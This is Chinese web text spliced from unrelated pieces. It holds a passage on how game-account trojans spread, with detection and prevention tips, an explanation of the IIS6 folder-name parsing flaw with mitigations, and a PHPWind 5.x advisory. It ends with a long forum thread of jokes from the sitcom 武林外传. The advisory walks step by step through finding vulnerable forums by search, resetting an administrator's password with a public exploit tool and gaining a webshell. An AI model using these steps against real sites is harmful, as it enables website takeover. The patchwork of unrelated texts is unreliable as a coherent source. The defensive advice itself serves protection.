然后到下载传播。上网的人,下载是常事。今天下载游戏,明天下载电影,后天下载某某软件。总的说,下载,是离不开网民的生活。但是,也正因如此,也给了那些盗号者机会,他们将木马连同软件或者游戏电影什么的一起打包压缩,骗取人们去下载他的压缩包。打个比方,一集电影大概为几百M,而一个木马程序小的话,也只有几十K。当你下载时,发现大小是几百M,自然就会深信不疑,因此,木马就名正言顺的走进了你的电脑。
除了以上这些,还有的把木马镶进各种如Word、Excel、PowerPoint等办公文档里,又或者使用聊天软件时聊天好友给你发送的一些的文件,而你出于对好友的信任,将文件保存进自己的电脑里。不要以为和你的聊天好友关系好就不会出现这情况,因为设想下,你的好友电脑也中了木马,而发过来的文件是木马所发,并非你的好友所发。这样说,明白了吧?
如何防范非技术性与技术性网络游戏盗号
网络游戏世界里,一件极品装备、一个高级帐号,不知要花费玩家多少金钱、心血和不眠之夜。对其倾注的感情更是无法用金钱衡量。因此,玩家最为担心的事情,莫过于自己的游戏帐号被盗窃,虚拟物品不翼而飞。最近经常看到某某玩家帐号被盗,帐号被盗自己心血全无,对游戏也失去信心,心恢意冷。朋友们也会为你伤心。所以怎么保护自己的帐号,就显得非常重要!
首先我们来了解盗取帐号的常见方法或手段!
1、使用木马等黑客软件
通过在用户计算机中安装或当用户浏览网页、下载东西时将木马自动植入用户的计算机中,此类程序隐蔽性较高,会将用户输入账号密码时的键盘记录发送到盗号者手中。更有一些软件可以监控到用户计算机的任何动作。
2、窥视
当玩家在公众场合进入游戏时,盗号者便在一旁偷看到玩家的密码的输入,然后进行记录。
3、冒充官方及游戏管理人员
(1)使用诸如“活动主持人”“奖品发放员”“gamemaster”等与GM相似意寓的名称或在冒充官方工作人员并以“发送奖品”等种种借口向玩家索要账号密码。
(2)制作虚假的网站,冒充官方发布一些虚假新闻以骗取玩家相关账号资料
4、外挂及虚假客户端程序
某些程序伪装为网游的客户端,当玩家使用本程序并输入账号信息,此信息将发送至盗号者。
外挂制作者只要在外挂中增加一个程序便可很容易得到使用者的账号信息。
知道了帐号是如何被盗的,我们就可以采取相应的防御措施。
刚才说的几种盗取手段可以分为技术性盗取和非技术性盗取!
上面所说的第二和第三种盗取手段应该属于非技术性盗取,防范措施相对来说就简单一些,注意以下几点:
1.在公众场合尽量比较隐蔽、快速的输入密码并注意周边是否有他人窥视
2.真正的GM不会在任何情况下以任何理由向玩家索要密码
3.不要在其它任何非官方的网站中填写或登陆自己的网游账号
4.如果冒充官方网站的情况,及时向官方举报
对于第一和第四种盗取手段应该技术性盗取,防范措施想对来说就比较复杂。下面做详细说明:
一.目前,很多人在各种论坛中发布各种所谓的外 挂程序,或者不明网站的链接,我们奉劝各位,千万不要点击。因为那很有可能会捆绑一个“键盘纪录器”。
1、请将IE的INTERNET选项的高级设置为恢复默认设置。
2、不要安装和下载一些来历不明的软件,特别是一些所谓的外 挂程序。
3、不要随便打开来历不明信件的附件。
4、安装最新杀毒软件,并定时升级病毒库。
5、小心网吧的计算机上安装有记录键盘操作的软件,或被安装了木马。使用网吧计算机时,需先按CTRL,ALT,DEL三个键,看看是否有来历不明的程序正在运行,如果有,则立即将该程序结束任务。
6、网吧上网的用户,最好先扫描一下机器看是否有木马程序。
二.针对于一些暴力破解密码的软件,破解用户的帐号密码,这种方法主要是通过使用一些暴力破解密码的软件,用穷举法逐个的尝试用户的帐号密码,但需要使用者有一定的电脑知识,而且破解需要很长时间
1、尽量避免将游戏帐号暴露在公众论坛和其他网站。
2、用户在设置密码时,尽量设置的复杂一点,最好设置为8位数以上的字母、数字和其他符号的组合。
3、不要使用可轻易获得的关于您的信息作为密码。这包括生日、身份证号码、手机号码、您所居住的街道的名字等等。
4、经常更换密码,因为8位数以上的字母、数字和其他符号的组合也不是无懈可击的。
5、申请密码保护(吞食即为暗码),也就是设置安全码,安全码不要和密码设置的一样。如果您没有设置安全码,那么别人一旦破解您的密码,就可以把您的密码和注册资料(除证件号码外)全部修改。
三.木马防御全攻略
木马,一直以来都是盗号人员不可缺少的软件,首先我们来认识一下这个罪恶之星。
“我想,我们应该烧掉这个东西。”3000多年前,面对希腊人突然遗留在战场废墟上的这只巨大的木马,特洛伊王国的小王子帕里斯对他的父王说。因为他有一种不安的感觉,这个突然出现的物体会带来厄运。然而没有人听他的话,整个军队固执的把这只庞然大物作为战利品运回了城里。几天后的夜里,藏在木马里的希腊士兵从内部打开了特洛伊那坚不可摧的城门——特洛伊因此沦陷。这就是木马名称的由来。
1、什么是木马
木马当然不是幼儿园里小朋友的玩具(可偏偏有人还这么认为过),而是一种远程控制软件。在杀毒软件的眼里,木马是病毒,是“带有恶意性质的黑客工具”。木马一般分为客户端(client)和服务端(server),客户端就是你自己使用的各种命令的控制台,服务端则是要给别人运行,只有当运行过服务端的电脑才能够“完全由你控制”!
2、木马有什么用
是不是曾有人在你面前炫耀过他能搞到别人的上网帐号?或者是五六位数的QQ密码?或者是网友的玉照?
在你没有认识木马前,这些炫耀者在你眼里无疑是神秘而崇拜的,你也可以轻易做到这个了!木马既然能够远程控制别人的计算机,那么它的计算机上的一切就都是你的,对你来说,他已毫无秘密可言
1、您的计算机是否已被装了木马?如何检测?
1)检查注册表
看HKEY_LOCAL_MACHINE/SOFTWARE/MicrosoftWindows/Curren Version 和HKEY_CURRENT_USER/Software/MicrosoftWindows/CurrentVersion下,所有以Run开头的键值名,其下有没有可疑的文件名。如果有,就需要删除相应的键值,再删除相应的应用程序。
2)检查启动组
木马们如果隐藏在启动组虽然不是十分隐蔽,但这里的确是自动加载运行的好场所,因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为:C:windowsstart menuprogramsstartup,在注册表中的位置: HKEY_CURRENT_USER/Software/MicrosoftWindows/Current Version/ExplorerShell Folders Startup=C:windowsstart menuprogramsstartup。要注意经常检查这两个地方哦!
3)Win.ini以及System.ini也是木马们喜欢的隐蔽场所,要注意这些地方。
比方说,Win.ini的[Windows]小节下的load和run后面在正常情况下是没有跟什么程序的,如果有了那就要小心了,看看是什么;在System.ini的[boot]小节的Shell=Explorer.exe后面也是加载木马的好场所,因此也要注意这里了。当你看到变成这样:
Shell=Explorer.exewind0ws.exe,请注意那个wind0ws.exe很有可能就是木马服务端程序!赶快检查吧。
4)检查C:windowswinstart.bat、C:windowswininit.ini、Autoexec.bat。木马们也很可能隐藏在那里。
5)如果是EXE文件启动,那么运行这个程序,看木马是否被装入内存,端口是否打开。如果是,则说明要么是该文件启动木马程序,要么是该文件捆绑了木马程序,只好再找一个这样的程序,重新安装一下了。
6)木马启动都有一个方式,它只是在一个特定的情况下启动,所以,平时多注意一下你的端口,查看一下正在运行的程序,用此来监测大部分木马应该没问题的。
2、目前已经有一些专门的清除木马的软件,在新推出天网防火墙里面捆绑有强大的木马清除功能,清除一般木马的机制原理主要是:
1)检测木马。
2)找到木马启动文件,一般在注册表及与系统启动有关的文件里能找到木马文件的位置。
3)删除木马文件,并且删除注册表或系统启动文件中关于木马的信息。
但对于一些十分狡滑的木马,这些措施是无法把它们找出来的,现在检测木马的手段无非是通过网络连接和查看系统进程,事实上,一些技术高明的木马编制者完全可以通过合理的隐藏通讯和进程使木马很难被检测到。
3、木马防范工具。
防范木马工具有很多,请您务必安装一个,以提高您的计算机的安全性。
三种方法解决IIS 6 目录检查安全漏洞
1、Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似hack.ASP的时候(即文件夹名看起来像一个ASP文件的文件名),此时此文件夹下的任何类型的文件都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩展名为.jpg或.gif之类的看起来像是图片文件的木马文件,通过访问这个文件即可运行木马。
2、 扩展名为.jpg/.gif的木马检查方法:
在资源管理器中使用详细资料方式,按类别查看。点“查看”菜单--“选择详细信息”--勾选上“尺寸”,确定。此时,正常的图片文件会显示出图片的尺寸大小,如果没有显示,则99%可以肯定是木马文件。用记事本程序打开即可100%确定.
3、 漏洞影响的范围:
安装了IIS6的服务器(windows2003),漏洞特征网站的管理权限被盗、导致网站被黑。因为微软尚未发布这个漏洞的补丁,所以几乎所有网站都会存在这个漏洞。
二、如何解决IIS6安全漏洞?
A 方案 :打补丁
本来安装补丁是一种比较保险的方法,可是漏洞已发现一段时间了,微软一直没有发布相关的补丁。
B方案:网站程序员解决
对于那些允许注册帐号的网站来说,在网站程序编写的时候,程序员通常为了管理方便,便以注册的用户名为名称来建立一个文件夹,用以保存该用户的数据。例如一些图片、文字等等信息。黑客们就是利用了这一特点,特意通过网站注册一个以.或者.cer的后续名作注册名,然后通过如把含有木马的ASP文件的.asp后缀改成.jpg等方法,把文件上传到服务器,由于IIS6漏洞,jpg文件可以通过IIS6来运行,木马也随着运行,达到了攻击网站的目的,这种情况,可以由程序员对注册用户名称进行限制,排除一些带有*.asp *.asa等字符为名的注册名。加强网站自身的安全和防范措施。另外,要阻止用户对文件夹进行重命名操作。
这种方法在一定程度上可以防范一些攻击行为,但是这种方法实现起来非常麻烦,网站的开发人员在程序安全性方面必须掌握相当好的技术,并且必须要对整个网站涉及文件管理方面的程序进行检查,一个网站少则几十,多则上千个文件,要查完相当费时,并且难免会漏掉其中一两个。
另外,目前有很多现成的网站系统只要下载后上传到空间就可以用,开发这些现有网站系统的程序员技术水平参差不齐,难免其中一些系统会存在这种漏洞,还有相当一部分系统的源码是加密过的,很多站长想改也改不动,面对漏洞无乎无能为力。
C方案:服务器配置解决
网站管理员可以通过修改服务器的配置来实现对这个漏洞的预防。如何对服务器进行配置呢?很多网站都允许用户上传一定数量的图片、Flash等,很多时候网站开发人员为了日后管理方便,对上传的文件都统一放到指定的一个文件夹里面,管理员只要对该文件夹的执行权限设置成“无”,这样一定程度可以对漏洞进行预防。
D方案: 服务商解决 服务器商对服务器进行统一的整体性过滤,通过编写组件来限制这种行为。但是能做到这种技术服务的主机供应服务商不多。
轻易绕过 PW论坛程序高危漏洞攻防详解
此次PW论坛出现严重的漏洞,主要是因为论坛目录中的passport_client.php文件里面的变量没有进行初始化设置,所以攻击者可以轻易地绕过那些判断。
漏洞利用
由于此次的漏洞攻击程序很快流传在各个论坛,而借助漏洞利用程序,不需要掌握什么技术,任何人都可以轻松攻击使用PW论坛程序的网站,这也是短时间内即有大量网站遭殃的原因之一。下面我们来看看攻击者是如何利用这个工具的。
首先利用搜索引擎搜索使用PW论坛的网站。打开Google的首页并点击旁边的“高级搜索”链接,把每页显示这一项改为100,接着在关键词输入框中输入“PoweredbyPHPWind5.0”,然后回车开始搜索。从搜索结果中任意打开一个链接,然后查看该PHPWind论坛程序的版本是否为5.0版,如果是的话就可以接着运行“PHPWind5.x最新漏洞利用工具”,在“BoardURL”中输入论坛地址,再点击“TestBug”按钮来检测该论坛是否存在这个漏洞。
如果的确存在漏洞的话,那么工具会提示用户“Ok!IFindbugsANDreadytoExpljit”。现在按照常规方法注册一个论坛账号,接着在网络中查找可能是管理员的用户ID,当然也可以直接通过论坛版主的ID一个一个进行测试。
现在运行“PHPWind5.x最新漏洞利用工具”,根据该工具的提示输入PHPWind论坛的信息,在 “BoardURL”选项中输入论坛地址,在“Username”选项中输入管理员的账号,“Password”选项的内容不用更改,最后只需要点击“Attack”按钮即可。
如果漏洞成功利用的话,工具将提示用户“The user addorpass word ischanged succeed”,这样就表示工具将管理员账号的密码改为123456。
然后利用这个管理员账号和密码进行登录,攻击者可以利用类似C/S的PHP木马从而得到一个WebShelll,如果在WebShelll进一步提升权限便可以控制整个网站,比如对论坛进行入侵和管理操作,比如数据库管理、上传文件、网页挂马等。由此可见,工具虽小,危害极大。
修补方法
这次的漏洞属于高危漏洞,任何没有进行修补的论坛管理员账户都可能被窃取。所以为了保证自己网站的安全,最简单的防护方法就是首先将文件passport_client.php删除,当然最好可以通过以下的方法对其进行修复。
1.首先从官方网站下载漏洞补丁,将里面的upload文件集覆盖网站论坛中的这个目录即可。
2.接着马上使用论坛创始人的账号密码进行登录,从而进入到论坛的系统后台进行操作,通常的后台地址为。立即修改本论坛创始人的密码,并且在后台检查是否有其他可疑的管理员账号,有的话马上删除。
3.如果管理员发现已经无法登录系统后台,可以使用论坛创始人密码修复工具。用文本编辑器打开pw_recover.php文件后,将$new_manager改为自己原来的论坛创始人账号,比如$new_manager= 'admin';同时将$new_password改为原来的的密码,比如$new_password='123456',然后将本程序上传到论坛根目录,运行该文件即可恢复创始人密码。
4.如果管理员发现网站系统被植入了木马,可以使用PW论坛发布的安全检测工具。将文件safe.php与safedata文件夹上传到论坛目录中,运行safe.php文件即可开始进行站点安全检查。发现木马程序后文件会自动删除非法文件,同时程序会在完成检查时给用户提供一个安全报告。
李大嘴:抢我台词
白展堂:这有什么?又不是什么好玩的……
李大嘴:那我,葵花点穴手!你乐意啊!?
白展堂:有什么呀,子曾经曰过……
吕秀才: I'm wrong I'm really wrong.at the begin. If I don't married my husband will never die if my husband would not die I wouldn't be here...
众人面面相觑。
白展堂:唠糟的什么玩意儿啊?
佟掌柜(自顾自):额错咧,额一开始就错咧,额如果不嫁过来,额滴夫君就不会死,额夫君不死额就不会沦落到介个地方……
众人:你怎么知道他说的是这句话。
佟掌柜:额介句最经典,(比画)排山倒海!!!!!
众人扭捏状:嫂子~~~~~~~~~~~~~~~~~~~~!!!!!!
佟掌柜:好了好了,到此为止
2.白展堂:想死,办法多得是,出门往西,有条西凉河。
游客:我会游泳,尤其擅长潜泳。
白展堂:那就找个悬崖跳下去。
游客:我跳过楼,让穿堂风给吹回去了
白展堂:那就找瓶毒药。
游客:我喝过农药,假冒伪劣的,拉了半个月肚子
白展堂:那就找根绳子……结实点的。
游客:找过,吊到一半地震了,房子震塌了,脖子没事儿,腿断了,现在一到阴雨天就疼。(接着白展堂晕。。。)
3. 梵文,第一个字:拿什么拯救你,第二个字:我的爱人(买琢子记)
4. 嘘!嘘!嘘!低调!低调!都低调!
5. 确定一定以及肯定;排山倒海~~~; 否决否认以及否定(郭芙蓉)
6.子曾经曰;莫子曰(秀才)
7. 交出臭鸡蛋,释放人质...(刑捕头)
8. 你去没去过天下第<二>泉。我听人说起过<二>次。在第<二>泉旁边有个<二>清观。在那个道观里,有<二>个道士。他们喜欢在第<二>泉旁边拉<二>胡,曲子就叫<二>泉映月。(秀才要债记)
9. 不蒸馒头争口气!
10. 雌盗:你放人!
白展堂:你放人!
雌盗:放了我们家小姐!
白展堂:放了我们家老板娘!
雌盗:放了我们家如花似玉的郭芙蓉!
白展堂:放了我们家风情万种的佟湘玉!
11. 吕:我刺你一剑你说四个字,我刺了你两剑你说了三万六千个字,为什么?
郭:……
吕:我刺你第一剑你说“大侠饶命”,我刺你第二剑你说“三万六千个字”!~(芙蓉秀才PK)
12.- 我吃的盐比你吃的饭都多
-那是你口重
-我过的桥比你走的路都多
-那是我不乐意动
13. “人在江湖飘,谁能不挨刀?白驼山壮骨粉,内用外服均有奇效。挨了刀涂一包,还想再挨第二刀,闪了腰吃一包,活到二百不显老。白驼山壮骨粉,青春的粉,友谊的粉,华山论剑指定营养品,本镇各大药铺医馆均有销售,购买时,请认准黑蛤蟆防伪标志,呱,呱……”
14. 这人啊,有穷死的,有抠死的,有酸死的,有撑死的,你说我要是让丑隔硬死这传出去不得让人笑死吗。
15. 枉费我对你的一片情谊、片情谊、片情谊!!!(芙蓉回声话经典!)
16. 如果上天能给我最后一次机会 我会对李大嘴说3个字 ............. "少放盐!!!"(小米)
17.郭芙蓉:刑捕头往那一站,就是七侠镇一霸(爸)!!
李大嘴:那谁是七侠镇一妈呀???
18. 秀才:偷者,不告而拿也。
19. 你是不是饿滴慌来,呀呼一呼嘿~~~~~~~~~~~~~~~~你要是饿得慌,你就对十娘讲,十娘给你做面汤……(杜十娘唱,展堂七窍流血)
20. 佟掌柜收了杜十娘的100两银子,被众人鄙视,
众人:“一百两银子就给你打发了阿!”
佟掌柜:“俺一看坚银子奏头闹法昏,俺这是不是见钱眼开阿~~~”
众人:“太是了!!!”
佟掌柜:“……”
众人:“你说你羞不羞,啊~~”
佟掌柜:“羞…………羞,并快乐着~~”
作者: 紫冰莹月 2007-4-21 14:53 回复此发言
2 回复:武林外传经典台词~~~~~~~~爆笑!!!!
21. 郭芙蓉:我有眼无珠,有口无心!
(后面还跟着一串把眼睛和心都挖出来扔地上并用脚碾碎的动作,搞笑死了……)
22. 少爷的身子跑堂的命(展堂)
23. 白对李大嘴说“你真是扶不起的阿斗”
大嘴傻呵呵的说“这阿斗也是个人物啊,对了,这阿斗出自哪里啊”
白讽刺他说“是水浒传里的一百单九将”
李大嘴说“不对啊,这好象只有一百零八将啊,你说我没文化呢吧,你要说是三国里的我还信“
白一拍桌子”真让你蒙对了,就是三国里刘备的儿子。“
大嘴说“你又骂我呢吧,一个姓刘的,一个姓阿,这能是父子吗?
(接着只看见白口吐鲜血)
24. 郭芙蓉对吕秀才:我一看你那呆样子就想野蛮。。。
25都死了?全死了?啥时候死的?怎么死的?案发现场在哪儿?有没有人证,物证,暂住证?(刑捕头)
26. 老板娘对秀才说:“你就好好活着,没事呆在那里别动,少费点力气,少吃点饭。”
27. ——“我上头有人”“我就纳闷儿了,上头有什麽人呢??”(刑捕头)
28. 大嘴问钱掌柜:“银子放脚底下特别硌的慌吧?”
钱掌柜回答:“等你结了婚就知道了,男人就因为这才长的鸡眼”(爆笑)
29. 佟掌柜:“别说掌门,掌窗户也不行。”
30. 各位来宾,各位百姓,大家晚上好,欢迎大家来到同福客栈,参加第一届鸡王争霸赛
郭:浩瀚苍穹,孕育了我们的历史与文明,
白:岁月如梭,造就了我们的勤劳和善良,
郭:在这片晴朗的天空下,我们吟咏歌唱,
白:在这片辽阔的土地上,我们自由翱翔!(鸡王争霸赛台词)
31. 小六:简直可以用四个字来形容
众人:令人发指
小六:再来四个
众人:惨绝人寰
32. 芙蓉和的饺子陷:猪皮上还有几丝晶莹的毛发。白菜梆子上还粘着点春泥,虾还带壳的
最搞笑的是,居然用浆糊粘饺子,再用线缝上
柜:你怎么不用鱼线,什么饺子简直就是鱼饵
大家吃饺子的时候更搞笑,芙蓉还说:你们别忘了吐丝哦!
33. 小六:一果……一颗六户习习门的新星……
X:是六扇门
34. 掌柜的对老邢怒吼:邢育森!
老邢回头很厉害地看了她一眼,
掌柜的立马满脸堆笑:真是个好名字~
35. 展堂扮强盗给老邢树立信心那集,展堂正在抢小米的破碗,被老邢看见
邢:你为什么抢他的碗?
白:他除了这个碗还有啥呀?
邢:那你为什么抢他?
白:这么晚了街上除了他就没人了.
邢:那我不算人吗?
36. 小贝:出水芙蓉 郭芙蓉得意中。。。。小贝又说:入土为安
37. “莫掌门咋死的?” “听说拿了帮里的钱盖房子……” “腐败啦?!”
38. 打死你我也不说!
39老邢的自我催眠:
这不是清汤面……这不是清汤面……这不是清汤面……
这是鳝丝面……这是鳝丝面……这是鳝丝面……
这不是小咸菜,这不是小咸菜,这不是小咸菜……
这是溜肥肠,这是溜肥肠,这是溜肥肠……
40.. ——白:行啊小郭,还学会绣企鹅啦!——佟:那是鸳鸯!!
41. 俄滴神哪~ 这都是神吗菜啊? 麻辣鱼鳞、冰糖肥肠、酒酿萝卜皮、红烧胖大海酥炸小黄瓜、清蒸黄鱼、碳烧母猪蹄?(
李大嘴新菜名)
42. 好一条风姿绰月美艳动人的鸡腿呀~(展堂)
43. 热Face贴上了冷臀部!(芙蓉)
44吕:也没什么,我就是比你多那么一点点内涵.
郭:你怎么不说你比我多一点内脏.
45..(1) 上联:抵制家庭暴力
下联:呼唤社会爱心
横披:不要和陌生人说话
(钱掌柜真惨~)(2)十只羊,一只蹲在羊圈里,一只蹲在猪圈里——抑扬顿挫
46. 老刑:那你就可忙吧,咱们可come on了,COME ON~~~~
47.子曰:知识就是力量 哪个子? 培根子 哪个朝代的? Britain 哦,也就是说Britain的培根子说你是咱们同福客栈最有力量的人咯? 某种意义上说,是这样的
作者: 紫冰莹月 2007-4-21 14:53 回复此发言
3 回复:武林外传经典台词~~~~~~~~爆笑!!!!
1. 天生我才必有有用,千金难买爷高兴
千金散尽还复来,爷想怎么用就怎么用(秀才)
2. 老板娘:你杂这样子嘛!什么时候睡觉不好,非得晚上睡啊?
3. 老白:杨过和小龙女知道不?
大嘴:杨过我不知道,小聋女我知道,西街的那个,说不出话,阿巴阿巴
4. 老白:要做好防火防盗和防腐工作
掌柜的:防腐?
老白:防止食物腐烂嘛
5. 大嘴:平谷一点红?我是他粉丝!
老白:你还腐竹呢,边儿去!
6. 老白:口红行动——口头捉拿一点红!
7. 平谷一点红: (洁癖状)你看你指甲缝里还有泥,太恶心了
芙蓉:(哭丧着脸)都是掌柜的每天让我干粗活
平谷一点红:(对掌柜的、悲愤状)干完活。。。得让人家洗手
8. 芙蓉:侯哥闪开!
秀才:八戒小心!
9. 咋回事嘛,生个娃都该娶媳妇咧。。。——佟湘玉
10. 很深情的:
天为什么是蓝的,因为我!
草为什么是绿的,还是因为我!
屁股为什么是臭的,因为老白!(爆笑) ——秀才
11. 白(对佟深情的):"你一会儿看云一会儿看我 ,你看云的时候离云很远,你看我的时候离我很近"
佟(感动):"展堂......"
白(立刻换表情):"坐下,没你啥事儿,瞧你贱的!"
12. 我是郭芙蓉
我酷爱武功
我来自江湖
我与众不同(小郭唱的《我不是黄蓉》改编版)
13. 大嘴学:秀才,你都喜欢我什么呀?妇道人家,老实呆着别瞎打听?
秀才:那她还不打死我?
大嘴:那你为啥喜欢我呀?爷喜欢你,那是给你面子,说句不好听的,爷想喜欢谁就喜欢谁,再来劲我抽你!
14. 你是马不知道自己的脸长!
你是牛不知道自己的皮厚!
15. ——吵架睡醒了就和好如初
——那不成猪脑子了吗
——天荒地老
——那不成俩老妖精了吗
——生一个男孩一个女孩
——最好是龙凤胎,生起来方便
16. 子啊,行行好带我走了吧!(秀才)
17. 白展堂(听完佟老爹对与管教女人和驯马的联系后 独自一人在院中感慨):哎呀 我的丈母娘呀 她是怎么挨到今天的呢?莫非她会铁布衫?(手做笔划状)
18. 小贝 懦妻 的解释:男的叫懦夫 女的当然叫懦妻啦。
19. 芙蓉:我最后一次警告你啊 请使用人类的语言和我交谈!
20. 掌柜:继续热烈接近疯狂地鼓掌!
21. 迟志强
22. 广告:
大嘴:哎又糊锅了 以后这工作还怎么做啊?
掌柜: 还在用铁锅炒菜吗?早就该换了 堂门不粘锅采用四川最近的堂门度铜技术 受热面积大 传热均匀 加热迅速 如果放少许的油即可烹饪出美味佳瑶 而且 清洗方便而且还不易粘锅现在购买还赠送堂门独家密制暗器一套先来先得 送完为止 各大客栈及兵器店均有销售 欢迎恰讯
大嘴:用堂门不粘锅炒菜 你好我也好
23. 广告:
小贝:嫂子我能帮你洗衣服了
掌柜:感动……
小贝:鸟牌皂角粉洗出一代好掌门
24. 广告:
芙蓉:哎有~~
无双:怎么了 又闪到腰了?
芙蓉: 不服老是不行啦
无双:年纪大了 骨质酥松 身体提醒你 缺钙啦
白驼山壮骨粉 北宋欧阳峰独家秘方 专为武林人士研制
芙蓉:可是我已经退出江湖了
无双:一样用得上 俗话说啊: 人在江湖飘,谁能不挨刀?白驼山壮骨粉,内用外服均有奇效。挨了刀涂一包,还想再挨第二刀,闪了腰吃一包,活到二百不显老。白驼山壮骨粉, 青春的粉,友谊的粉,华山论剑指定营养品,本镇各大药铺医馆均有销售,购买时,请认准 黑蛤蟆防伪标志,呱,呱……”
25. 老白这位姑娘 做为连输两场比赛的选手 你有什么感想
芙蓉:一个字 爽
老白:那我就送你一句话,打碎了牙千万别往肚子里咽
芙蓉:喂啥啊?
作者: 紫冰莹月 2007-4-21 14:54 回复此发言
4 回复:武林外传经典台词~~~~~~~~爆笑!!!!
老白:容易有内伤啊
芙蓉:主持人是个贼 传说中的盗圣就是他 就是他
老白:这位参赛选手真会说笑话……导播 把这段掐了啊
26. 一般一般,港姐第三。很丑很丑,亚姐第九。
27. 湘玉:事到如今,就只剩下最后一个办法了……
小六:嘛办法?
湘玉:三十六计。
小六:三十六计是嘛计?
小郭(开唱):爱情三十六计~~(此时众人起舞)最好走为上计~~我要自己掌握遥控器~~~
老白:(接着唱)不要以为~~~(忽停,对郭等众人说)都给我打住了!(转对湘玉说)那你打算上哪啊?
湘玉:先离开这儿再说,反正是不能回陕西,咱们可以往南走一直到大理……
小郭:诶,大理好诶,风景超~~~美的咯!
湘玉:到大理歇口气,咱们再转道去缅甸……
大嘴:缅甸好啊,那旮旯香蕉好吃啊~!
湘玉:如果到了缅甸还有追兵的话,咱们再转道去泰国……
小郭:唉呦~~泰国的寺庙超眩的啦~~~!呵呵
湘玉:如果泰国还是呆不下去的话,咱们就转水路,前往东瀛……
众人(态度坚决,扭头,厌恶状):不去!!
湘玉:那就高丽……
众人(回头,同意状):那行。
湘玉:一路往北到西伯利亚转乘雪橇,直达北极圈,然后再从阿拉斯加一路向南,横穿赤道,长途跋涉,直达南极圈的冻土层,然后……
众人:还要走啊?!
湘玉:最后一步,到达南极圈之后,带足干粮和水,转搭火箭,飞入太空,在火星表层降落,开始全新的生活~~~~~~!
(悠扬的音乐起~~~众人憧憬状)
秀才:那要是到了火星还有追兵呢?(音乐止)
众人:嗯??(开始爆捶秀才……)
(秀才挣扎爬起)湘玉:那就只有离开太阳系了……
众人:嗯??(悲凉音乐起)
湘玉:茫茫宇宙,浩瀚星空,难道就没有我的栖身之地吗,展堂?
老白(搂湘玉):一切都听你的,你说去哪儿咱就去哪儿,一步不落。
众女:(开唱)你是风儿~~我是沙~~~
众男:(接唱)凄凄惨惨~~走天涯~~~
众人合:你是风儿~~我是沙~~~
28. (后院)
老白:(微怒)你说什么?!
秀才:(无奈)我也没办法,芙妹她看的紧啊……
老白:你呀你呀,你就找快嫩点的豆腐撞死得了!(一把把秀才推到磨盘上)
秀才:这又不是豆腐……再说又不是我赶她走的,芙妹她……
大嘴:太不像话了,没见过她这么办事的!
秀才:这话你当她面说去!
大嘴:我凭啥说呀?她又不是我女朋友!这就没换成慧兰,这要换成慧兰,我早就一大耳刮子我……(忽停)
老白:接着说!
秀才:大耳刮子怎么了?
大嘴:我糊我自己脸上……(脸红,笑道)然后我再跪地求饶,请求她原谅……
老白:原谅啥呀?
大嘴:朝三暮四招蜂引蝶呗~!
秀才:(不服)哼~~我就朝三暮四了我?!知道是这样我当初还不如选无双呢……
老白:(脸转向门口,一脸坏笑)诶,小郭你啥时候来的?
秀才:(举手抱头跪地缩成一团)哎呀哎呀~~~我错了,我错了!!你大人不记小人过,宰相肚里能撑船,月落乌蹄霜满天,夫妻双双把家还~~~~~~~~!
老白:(怒其不争)你瞧瞧你这熊样啊!人还没来呢你就吓成这样,人要来了你不得以死谢罪啊?!
秀才:(抬头,看门口)真没来啊?(站起,边拍胸脯边说)吓死我了……(转对老白)你就坏吧,迟早遭报应!!
老白:(怒)你才遭报应呢!!本来挺好的小两口,眉来眼去,唇红齿白的,活活让你给搅和黄了!!
秀才:(转身要走)那我把无双找回来!
(小郭刚进门,见秀才欲出)小郭:去哪儿啊秀才?
大嘴:找无双去呗!
秀才:我是为了无双的幸福!
小郭:(怒)说什么?你说什么?!你给我再说一遍!!
29. 众人围在一起商量如何对付猫咪)
作者: 紫冰莹月 2007-4-21 14:54 回复此发言
5 回复:武林外传经典台词~~~~~~~~爆笑!!!!
小郭:(不耐烦)你就说你同不同意干掉那只猫?
秀才:我的意见就是先礼后兵……
小郭:(语气泛酸)这猫要是别人救的,你还会是这个态度吗?
秀才:你什么意思啊?
小郭:(摩拳擦掌)我什么意思你心理清楚!
秀才:镇定点,镇定点……我跟无双……她都走了三个月啦……
小郭:所以你才舍不得杀那只猫啊,见了那只猫就如同见了无双本人~~!
秀才:你还帮我逮过耗子呢,我见了短腿耗子就如同见了你一样啊?
小郭:(拍案而起)她是猫,我是耗子是吧?!
老白:那还是只短腿的呢……(见小郭怒瞪,忙道)不是我说的,秀才说的!
(秀才语塞,怒向老白)
小郭:喂你的猫去吧!(甩手便走向后院)
秀才:(对老白)讨厌!(忙追赶小郭)芙妹~你听我说,我不是这个意思~不是这个意思……(随小郭入后院,二人站于门帘后)
老白:(悄声)大嘴,你听~~~
(门帘后传出啪啪拍打声,咚咚猛捶声,及秀才“啊、啊”呼喊声)
(秀才出,两眼变熊猫)
老白:(狂笑)哎呀!这咋整的?
大嘴:(狂笑,附和)咋整的?
秀才:(清咳两声)没事儿,不小心撞门上了
老白:(顿悟状)哦~~~~能同时撞两只眼睛,而且撞得这么均匀,这么圆润,不愧是关中大侠……(又一阵狂笑)
30. (假小六事件后第二天早,真小六上门,由于前晚的迷汤还没过劲,走路晃晃悠悠,脑筋也不清不楚)
(众人见小六进门)众人:诶?小六?!
湘玉:小六,来来来,这边这边,你没事吧?
小六:(热情向众人招手)嗨~~~~我很好,你们好吗~~~~?
众人:(诧异,语气犹豫)好……
小六:(撒娇)大声一点嘛~~~!
众人:(提高音量)好!!
小六:(两手做“V”字形,高兴跳起)耶~~~~~~~!!我很爱你们呐~~~(作飞吻状)
(众人吹口哨、鼓掌、欢呼)
小六:(双手握刀柄,充当MIC,激动)接下来,我为大家献上一曲~~~~~~~~
(众人又一次吹口哨、鼓掌、欢呼)
小六:(回过神来,手捂脑袋)不对不对,我乱了……刚说到哪儿了?
众人:献上一曲~~~~~~~~~
小六:不不~~我重说啊,刚才跟十村八店的弟兄开了个会,我们一致决定……(望着众人,疑惑)是你们吗?
众人:是我们啊!
小六:(情急,手拍脑袋)是你们吗??!
众人:(情急,手拍桌子)是我们啊!!!
小六:不行,需要证明!!
众人:怎么证明啊??
小六:(有点混乱)我脑子不好使,你们互相证明,从秀才开始!
秀才:我我……(不知所措)
小郭:(叉腰一站)我来!无双美还是我美?
秀才:当然是你美,你比她美一百八十倍!
小郭:(开心)是他,证明完毕!你证明我。
秀才:我和你追风师兄谁更帅?
